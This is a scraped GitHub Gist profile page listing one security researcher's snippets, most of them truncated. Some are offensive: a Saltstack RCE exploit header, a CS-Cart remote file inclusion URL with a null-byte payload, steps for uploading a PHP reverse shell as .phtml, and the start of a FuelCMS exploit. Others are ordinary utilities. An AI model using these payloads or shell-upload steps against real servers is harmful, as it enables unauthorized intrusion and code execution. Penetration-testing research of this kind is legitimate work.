Skip to content

Instantly share code, notes, and snippets.

View momenbasel's full-sized avatar

Moamen Basel momenbasel

View GitHub Profile
# Installs the Trend Micro Deep Security Agent (DSA) on Ubuntu/Debian
# and ensures it persists after reboot.
# Then you can create an AMI from this instance so that all future instances
# automatically have DSA pre-installed.
momenbasel / gist:149eec9d8004e10414f68454decec538
Created November 18, 2022 20:33
script for reading burpsuite scope and extract the urls
#script for reading burpsuite scope and extract the urls
#python3 -m pip install -U find_domains iplookup python-whois
#or pip3 install -r requirements.txt
momenbasel /
Created October 24, 2022 08:57
get ips from cidr file
from netaddr import IPNetwork
import socket
from contextlib import closing
ips = open("ips.txt", "r") #insert here IP file here
ip_arr= ('\n')
momenbasel / pwning with PI
Last active February 26, 2021 18:52
import subprocess
import time
while True:
proc = subprocess.Popen('./', stdin=subprocess.PIPE)
momenbasel /
Created October 2, 2020 13:48
edited Saltstack 3000.1 - Remote Code Execution
# Exploit Title: Saltstack 3000.1 - Remote Code Execution
# Date: 2020-05-04
#edited: 2020-10-02
#the edit: instead of testing locally --first--, making it testing remotely
# Exploit Author: Jasper Lievisse Adriaanse
# Vendor Homepage:
# Version: < 3000.2, < 2019.2.4, 2017.*, 2018.*
# Tested on: Debian 10 with Salt 2019.2.0
# CVE : CVE-2020-11651 and CVE-2020-11652
# Description: Saltstack authentication bypass/remote code execution
momenbasel / thm-OneLiner.js
Created September 23, 2020 17:38
THM add 1 hour automatically, so you can hack peacefully without worrying about expiring the machine.
setInterval(function(){addHour(); console.log(" : <= Added '1 Hour' times! \n"); }, 3600000);
//adds one hour every half-hour
momenbasel / rce.phtml
Created September 23, 2020 15:48
cs cart authenticated RCE
get PHP shells from
edit IP && PORT
Upload to file manager
change the extension from .php to .phtml
visit http://[victim]/skins/shell.phtml --> Profit. ...!
momenbasel / gist:a683e991c8758e62704a28a2b90f087e
Created September 23, 2020 15:22
CS-Cart 1.3.3 - 'classes_dir' Remote File Inclusion[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=[evil_scripts]%00
momenbasel /
Last active June 6, 2024 21:26
tp-link Tl-wn722n v2/v3 monitoring && packet injection. atheros ar9271
apt update -y && apt upgrade -y && apt dist-upgrade
sudo apt-get install linux-headers-$(uname -r) -y
sudo apt install bc -y
sudo rmmod r8188eu.ko
git clone
cd rtl8188eus
sudo -i
echo "blacklist r8188eu.ko" > "/etc/modprobe.d/realtek.conf"
momenbasel /
Created September 18, 2020 21:08
python3 edited fuelCMS 1.4.1 exploit ( 2018-16763
import requests
import urllib
url = "http://rhost/"
def find_nth_overlapping(haystack, needle, n):
start = haystack.find(needle)
while start >= 0 and n > 1:
start = haystack.find(needle, start+1)
n -= 1